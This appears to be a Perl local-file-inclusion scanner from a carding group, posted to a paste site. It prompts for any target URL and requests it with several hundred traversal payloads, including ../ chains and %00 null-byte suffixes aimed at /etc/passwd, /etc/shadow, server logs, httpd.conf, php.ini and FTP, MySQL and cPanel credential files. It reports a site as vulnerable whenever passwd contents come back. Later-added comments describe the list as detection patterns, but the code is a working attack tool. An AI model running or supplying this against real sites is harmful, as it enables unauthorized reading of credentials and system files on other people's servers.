cybercode

LFI Scanner - Perl

Jan 16th, 2012
  1. #!/usr/bin/perl -w
  2.  
  3. use LWP::UserAgent;
  4. use HTTP::Request;
  5.  
  6. system('clear','cls');
  7.  
  8. print "|----------------------------------------------------|\n";
  9. print "|  YOGYACARDERLINK Full Local File Inclusion Scanner |\n";
  10. print "| Coded by : v3n0m                                   |\n";
  11. print "| Date     : December 19 2009                        |\n";
  12. print "| sHoutz   : All Yogyacarderlink Crew                |\n";
  13. print "|                                                    |\n";
  14. print "|                                                    |\n";
  15. print "|                         YOGYACARDERLINK            |\n";
  16. print "|----------------------------------------------------|\n\n";
  17. print "\nInsert target: ";
  18. chomp(my $target = <STDIN>);
  19.  
  20. if($target !~ /http:\/\//) { $target = "http://$target"; }
  21.  
  22. print "\npress [enter] to check the version of httpd[...]\n";
  23. $httpd =<STDIN>;
  24.  
  25. $host = $target;
  26. $useragent = LWP::UserAgent->new;
  27. $resp = $useragent->head($host);
  28. print $resp->headers_as_string;
  29.  
  30. print "\npress [enter] to check the vulnerability in lfi[...]\n";
  31. $start =<STDIN>;
  32.  
  33.  
# Candidate path list. The loop at the end of the script appends each entry,
# one per request, to the target prefix.
#
# Contents, in order: absolute paths to account files (/etc/passwd,
# /etc/shadow, /etc/group, /etc/security/*), web-server access/error logs,
# httpd.conf and php.ini locations (Unix, macOS /Volumes and Windows-style
# backslash paths), cPanel, MySQL, FTP-daemon and Exim files; then ../ chains
# of increasing depth in front of the account files; then fixed-depth ../
# chains for (mostly) log paths, first with a trailing %00 and then without.
#
# Entries are kept exactly as pasted, including many exact duplicates and a
# few that look like typos; nothing here is normalised.
#
# Defensive reading of this list:
#  - Seen from the server, these strings are ready-made detection patterns
#    for access-log searches and WAF rules: runs of ../, the file names
#    below, and a trailing %00 in a request URI.
#  - %00 is a URL-encoded NUL byte, aimed at runtimes that truncate file
#    names at NUL so that a suffix appended by the application is cut off.
#    PHP has rejected NUL bytes in file paths since 5.3.4.
#  - /etc/shadow is normally readable only by root, so a successful read of
#    it through a web application also means the serving process is
#    over-privileged.
@vulnerabilities = ('/etc/passwd',
'/etc/shadow',
'/etc/group',
'/etc/security/group',
'/etc/security/passwd',
'/etc/security/user',
'/etc/security/environ',
'/etc/security/limits',
'/usr/lib/security/mkuser.default',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access. log',
'/var/log/apache/access_log',
'/var/log/apache2/access_log',
'/var/log/apache/access.log',
'/var/log/apache2/access.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache2/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/error.log',
'/var/log/error_log',
'/var/log/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/var/log/httpd/access_log',
'/var/log/httpd/error_log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/apache2/logs/error.log',
'/apache2/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/usr/local/apache2/logs/access_log',
'/usr/local/apache2/logs/access.log',
'/usr/local/apache2/logs/error_log',
'/usr/local/apache2/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/var/log/httpd/access_log',
'/var/log/httpd/access.log',
'/var/log/httpd/error_log',
'/var/log/httpd/error.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/apache2/access_log',
'/var/log/apache2/access.log',
'/var/log/apache2/error_log',
'/var/log/apache2/error.log',
'/var/log/access_log',
'/var/log/access.log',
'/var/log/error_log',
'/var/log/error.log',
'/opt/lampp/logs/access_log',
'/opt/lampp/logs/error_log',
'/opt/xampp/logs/access_log',
'/opt/xampp/logs/error_log',
'/opt/lampp/logs/access.log',
'/opt/lampp/logs/error.log',
'/opt/xampp/logs/access.log',
'/opt/xampp/logs/error.log',
'/Program Files\Apache Group\Apache\logs\access.log',
'/Program Files\Apache Group\Apache\logs\error.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/apache/logs/error.log',
'/apache/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/logs/error.log',
'/logs/access.log',
'/etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces.log',
'/etc/httpd/logs/error_log',
'/etc/httpd/logs/error.log',
'/var/www/logs/access_log',
'/var/www/logs/access.log',
'/usr/local/apache/logs/access_log',
'/usr/local/apache/logs/access.log',
'/var/log/apache/access_log',
'/var/log/apache/access.log',
'/var/log/access_log',
'/var/www/logs/error_log',
'/var/www/logs/error.log',
'/usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error.log',
'/var/log/apache/error_log',
'/var/log/apache/error.log',
'/var/log/access_log',
'/var/log/error_log',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/usr/local/apache/httpd.conf',
'/usr/local/apache2/httpd.conf',
'/usr/local/httpd/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache2/conf/httpd.conf',
'/usr/local/etc/httpd/conf/httpd.conf',
'/usr/apache2/conf/httpd.conf',
'/usr/apache/conf/httpd.conf',
'/usr/local/apps/apache2/conf/httpd.conf',
'/usr/local/apps/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf',
'/etc/apache2/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf',
'/etc/http/conf/httpd.conf',
'/etc/apache2/httpd.conf',
'/etc/httpd/httpd.conf',
'/etc/http/httpd.conf',
'/etc/httpd.conf',
'/opt/apache/conf/httpd.conf',
'/opt/apache2/conf/httpd.conf',
'/var/www/conf/httpd.conf',
'/private/etc/httpd/httpd.conf',
'/private/etc/httpd/httpd.conf.default',
'/Volumes/webBackup/opt/apache2/conf/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf',
'/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
'/Program Files\Apache Group\Apache\conf\httpd.conf',
'/Program Files\Apache Group\Apache2\conf\httpd.conf',
'/Program Files\xampp\apache\conf\httpd.conf',
'/usr/local/php/httpd.conf.php',
'/usr/local/php4/httpd.conf.php',
'/usr/local/php5/httpd.conf.php',
'/usr/local/php/httpd.conf',
'/usr/local/php4/httpd.conf',
'/usr/local/php5/httpd.conf',
'/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
'/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
'/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
'/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
'/usr/local/etc/apache/vhosts.conf',
'/etc/php.ini',
'/bin/php.ini',
'/etc/httpd/php.ini',
'/usr/lib/php.ini',
'/usr/lib/php/php.ini',
'/usr/local/etc/php.ini',
'/usr/local/lib/php.ini',
'/usr/local/php/lib/php.ini',
'/usr/local/php4/lib/php.ini',
'/usr/local/php5/lib/php.ini',
'/usr/local/apache/conf/php.ini',
'/etc/php4.4/fcgi/php.ini',
'/etc/php4/apache/php.ini',
'/etc/php4/apache2/php.ini',
'/etc/php5/apache/php.ini',
'/etc/php5/apache2/php.ini',
'/etc/php/php.ini',
'/etc/php/php4/php.ini',
'/etc/php/apache/php.ini',
'/etc/php/apache2/php.ini',
'/web/conf/php.ini',
'/usr/local/Zend/etc/php.ini',
'/opt/xampp/etc/php.ini',
'/var/local/www/conf/php.ini',
'/etc/php/cgi/php.ini',
'/etc/php4/cgi/php.ini',
'/etc/php5/cgi/php.ini',
'/php5\php.ini',
'/php4\php.ini',
'/php\php.ini',
'/PHP\php.ini',
'/WINDOWS\php.ini',
'/WINNT\php.ini',
'/apache\php\php.ini',
'/xampp\apache\bin\php.ini',
'/NetServer\bin\stable\apache\php.ini',
'/home2\bin\stable\apache\php.ini',
'/home\bin\stable\apache\php.ini',
'/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
'/usr/local/cpanel/logs',
'/usr/local/cpanel/logs/stats_log',
'/usr/local/cpanel/logs/access_log',
'/usr/local/cpanel/logs/error_log',
'/usr/local/cpanel/logs/license_log',
'/usr/local/cpanel/logs/login_log',
'/usr/local/cpanel/logs/stats_log',
'/var/cpanel/cpanel.config',
'/var/log/mysql/mysql-bin.log',
'/var/log/mysql.log',
'/var/log/mysqlderror.log',
'/var/log/mysql/mysql.log',
'/var/log/mysql/mysql-slow.log',
'/var/mysql.log',
'/var/lib/mysql/my.cnf',
'/etc/mysql/my.cnf',
'/etc/my.cnf',
'/etc/logrotate.d/proftpd',
'/www/logs/proftpd.system.log',
'/var/log/proftpd',
'/etc/proftp.conf',
'/etc/protpd/proftpd.conf',
'/etc/vhcs2/proftpd/proftpd.conf',
'/etc/proftpd/modules.conf',
'/var/log/vsftpd.log',
'/etc/vsftpd.chroot_list',
'/etc/logrotate.d/vsftpd.log',
'/etc/vsftpd/vsftpd.conf',
'/etc/vsftpd.conf',
'/etc/chrootUsers',
'/var/log/xferlog',
'/var/adm/log/xferlog',
'/etc/wu-ftpd/ftpaccess',
'/etc/wu-ftpd/ftphosts',
'/etc/wu-ftpd/ftpusers',
'/usr/sbin/pure-config.pl',
'/usr/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.conf',
'/usr/local/etc/pure-ftpd.conf',
'/usr/local/etc/pureftpd.pdb',
'/usr/local/pureftpd/etc/pureftpd.pdb',
'/usr/local/pureftpd/sbin/pure-config.pl',
'/usr/local/pureftpd/etc/pure-ftpd.conf',
'-/etc/pure-ftpd.conf',
'/etc/pure-ftpd/pure-ftpd.pdb',
'/etc/pureftpd.pdb',
'/etc/pureftpd.passwd',
'/etc/pure-ftpd/pureftpd.pdb',
'/usr/ports/ftp/pure-ftpd/',
'/usr/ports/net/pure-ftpd/',
'/usr/pkgsrc/net/pureftpd/',
'/usr/ports/contrib/pure-ftpd/',
'/var/log/pure-ftpd/pure-ftpd.log',
'/logs/pure-ftpd.log',
'/var/log/pureftpd.log',
'/var/log/ftp-proxy/ftp-proxy.log',
'/var/log/ftp-proxy',
'/var/log/ftplog',
'/etc/logrotate.d/ftp',
'/etc/ftpchroot',
'/etc/ftphosts',
'/var/log/exim_mainlog',
'/var/log/exim/mainlog',
'/var/log/maillog',
'/var/log/exim_paniclog',
'/var/log/exim/paniclog',
'/var/log/exim/rejectlog',
'/var/log/exim_rejectlog',
# Relative traversal: ../ chains of increasing depth in front of the account
# files.
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
# Fixed-depth ../ chains with a trailing %00 (URL-encoded NUL byte).
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log%00',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log%00',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/error.log%00',
'../../../../../../../../../../../../../../../apache2/logs/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../../../../../var/www/logs/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../../../../../var/log/apache/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/access.log%00',
'../../../../../../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../../../../../var/www/logs/error.log%00',
'../../../../../../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../../../../../var/log/access.log%00',
'../../../../../../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../../../../../var/log/apache/error.log%00',
'../../../../../../../../../../../../../../../var/log/apache2/error.log%00',
'../../../../../../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../../../../../var/log/error.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../../../../../var/log/httpd/access.log%00',
'../../../../../../../../../../../../../../../var/log/httpd/error.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log%00',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log%00',
# The same fixed-depth paths again, without the %00 suffix.
'../../../../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/error.log',
'../../../../../../../../../../../../../../../apache2/logs/access.log',
'../../../../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../../../../../../opt/xampp/logs/error.log');
  519.  
  520. print "\tPAYLOAD LOADED IN PROGRESS...\n\n";
  521.  
  522.  
  523. foreach $scan(@vulnerabilities){
  524.  
  525. $url = $target.$scan;
  526. $request = HTTP::Request->new(GET=>$url);
  527. $useragent = LWP::UserAgent->new();
  528.  
  529. $response = $useragent->request($request);
  530. if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable;}
  531. else { $msg = "Not Vulnerable";}
  532.  
  533. print "$scan..........[$msg]\n";
  534. }